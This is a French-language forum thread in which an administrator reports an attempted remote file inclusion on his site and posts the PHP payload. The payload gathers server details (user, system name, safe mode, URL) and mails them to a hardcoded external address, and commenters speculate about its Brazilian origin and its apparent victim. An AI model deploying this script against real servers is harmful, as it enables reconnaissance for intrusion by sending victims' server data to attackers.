Un baby hackeur particulier

Ici, on parle de ce qu'on veut avec ceux qu'on peut ;p

Modérateur : Team Modération

Répondre
Avatar du membre
edd
Administrateur
Administrateur
Messages : 6936
Enregistré le : 17 avr. 2005 00:43
Localisation : Le Mans

Un baby hackeur particulier

Message par edd »

En regardant l'activité louche du site. J'ai vu que Sylvain Chouquette a tenté d'inclure la page
http://rouquette.sylvain.free.fr/stage2003/tester.txt

Code : Tout sélectionner

<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// lupalupa
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Segurança</i> = " . $SafeMode . "
http://" . $delet . " 

SE FOR XEGADO DO LUPA TEM TUDO com: <u>delet</u>");
$email = "leandrro.mello@gmail.com";
$assunto = "MARAVILHA";
$email1 = "leandrro.mello@gmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "Não foi.";
exit();
}
?>
Je ne sais pas trop à quoi sert ce script ("scan inbox hotmail"?) mais je vois pas bien pourquoi tenté de l'incruster dans DA... Bref. En creusant, je suis tombé là-dessus http://gisele.rouquette.free.fr/blog/ (mauvaise piste, sans doute la maman de l'interessé, en fait une redirection depuis http://rouquette.sylvain.free.fr), puis là http://rouquette.sylvain.free.fr/stage2003/ , ce serait donc le "Président de l’association EpitAnime (plus de 200 membres) des années 2000 et 2001", ben dis-donc ;p

Bref, tout ça pour dire, évitez les tentatives d'inclusion de script surtout si le script en question est sur votre "page CV" ou le blog de votre maman...

(on peut me dire ce que fait ce script?)
-|- edd -|- W&W player!
ImageImage
merci de privilégier le formulaire de contact aux MP s'il s'agit d'une demande/ajout concernant le site
renkei
membre actif
membre actif
Messages : 206
Enregistré le : 09 juin 2008 22:37
Localisation : 45.759785,4.875651

Message par renkei »

Déjà c'est espagnol je croit :P après....
Avatar du membre
unchpkeb
nouveau venu
nouveau venu
Messages : 98
Enregistré le : 21 mai 2008 02:13
Localisation : Ch'Nord

Message par unchpkeb »

c'est du portugais enfaite. aucune idee sinon..
"je suis nono le robot "
Avatar du membre
Venom
Team Modération
Team Modération
Messages : 6384
Enregistré le : 25 avr. 2005 01:51

Message par Venom »

En fait ce sont des Brésiliens: http://www.zataz.com/interviews-securit ... fault.html

Je ne pense pas que ce malheureux sylvain ait fait ça mais plutôt qu'il a déjà fait les frais de ce groupe.

J'ai l'impression que ce script essaye de récupérer les login et mdp de l'admin du compte free.fr puis les envoi par mail à nos amis "hackers" en leur disant si le hack a réussi ou pas.

Si c'est possible il faudrait prévenir le pauvre sylvain pour qu'il corrige ça et que ces comiques évitent de passer par lui pour hacker d'autres sites...
Répondre